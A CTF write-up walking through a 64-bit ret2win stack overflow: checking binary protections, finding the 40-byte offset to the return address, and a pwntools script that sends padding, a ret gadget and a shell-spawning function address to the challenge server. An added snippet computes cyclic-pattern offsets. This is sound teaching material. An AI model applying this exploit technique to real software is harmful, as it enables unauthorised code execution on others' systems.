This is a basic ret2win challenge from jornadas CTF. Here we just need to overflow the buffer up to the saved return address (RIP) and redirect execution to the function that gives us a shell.
First, we check the file type and the memory protections applied to the binary.
We can see this is a 64-bit binary, dynamically linked and not stripped, which makes our life easier. NX is enabled, so we cannot execute anything from the stack.
We will find the overflow offset to RIP using gdb-peda's pattern tools.
We can see that RBP has been overwritten with “A)AAEAAa”. Looking up this value in the pattern we supplied gives the offset to the saved RBP; the return address sits 8 bytes after it.
Adding 8 gives 40, so 40 junk bytes are needed to overflow the buffer and reach the RIP/return address slot.
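To show where the "offset to RBP + 8" arithmetic comes from, here is an added example (not code from the write-up) with a pwntools-style cyclic pattern and a constructed stand-in for the gdb crash; gdb-peda uses a different charset, so its bytes such as "A)AAEAAa" differ from this pattern, but the method is the same.

```python
# Added example: de Bruijn pattern generator plus offset lookup, mirroring what
# gdb-peda's pattern_create / pattern_offset do for the write-up's 32-byte buffer.
ALPHABET = b"abcdefghijklmnopqrstuvwxyz"

def de_bruijn(length, alphabet=ALPHABET, n=4):
    """Return `length` bytes of a de Bruijn sequence: every n-byte window is unique,
    so any n bytes read back from a crashed register map to exactly one offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if len(out) >= length:      # stop as soon as we have enough bytes
            return
        if t > n:
            if n % p == 0:
                out.extend(alphabet[a[j]] for j in range(1, p + 1))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out[:length])

def cyclic_find(pattern, value, n=4):
    """Offset of the first n bytes of `value` (memory order, as gdb shows the string)."""
    return pattern.find(value[:n])

def simulate_overflow(pattern, buf_size):
    """Constructed stand-in for the gdb crash: a frame whose `buf_size`-byte buffer
    is followed directly by the saved RBP and then the saved return address."""
    saved_rbp = pattern[buf_size:buf_size + 8]
    saved_rip = pattern[buf_size + 8:buf_size + 16]
    return saved_rbp, saved_rip

def rip_offset_from_rbp(pattern, saved_rbp_qword):
    """The write-up's arithmetic: find where the RBP bytes came from, then add 8."""
    rbp_off = cyclic_find(pattern, saved_rbp_qword)
    if rbp_off < 0:
        raise ValueError("RBP contents not found in pattern")
    return rbp_off + 8

if __name__ == "__main__":
    pat = de_bruijn(64)
    rbp, rip = simulate_overflow(pat, 32)   # 32-byte buffer, as in the write-up
    print("offset to return address:", rip_offset_from_rbp(pat, rbp))  # 40
```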
Now, let's check the functions present in this binary.
We have a suspicious function, “portal”. Let us disassemble it.
There we go! It calls system(), so we can pop a shell by returning to this address.
Here is a Python script using pwntools that does the work:

```python
from pwn import *

#p = process("./bin3")
p = remote("challenges.ctf.cert.rcts.pt", 58209)

ret = p64(0x0000000000401016)       # address of a `ret` gadget, used only for stack alignment
overwrite = b"A" * 40               # 40 junk bytes to reach the saved return address
portal = p64(0x0000000000401152)    # address of portal(), which calls system()

# The extra `ret` is needed on Ubuntu because of a movaps alignment issue:
# without it system() can segfault. Read
# https://stackoverflow.com/questions/60729616/segfault-in-ret2libc-attack-but-not-hardcoded-system-call
# to understand the issue.
payload = overwrite + ret + portal

p.recvuntil(b"In order to open the Portal, you need magic words:")
# The extracted snippet ended here; sending the payload and switching to
# interactive mode completes it.
p.sendline(payload)
p.interactive()
```
Running this script should drop you into a shell.
Hope you understood the challenge. Do check out my other blogs.
Don’t forget to give some claps if you reached here :) Follow me for more write-ups.